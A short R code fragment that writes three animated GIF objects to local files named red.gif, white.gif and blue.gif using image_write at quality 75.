image_write(p1_mgif, path = "red.gif", format = "gif", quality = 75)
image_write(p2_mgif, path = "white.gif", format = "gif", quality = 75)
image_write(p3_mgif, path = "blue.gif", format = "gif", quality = 75)
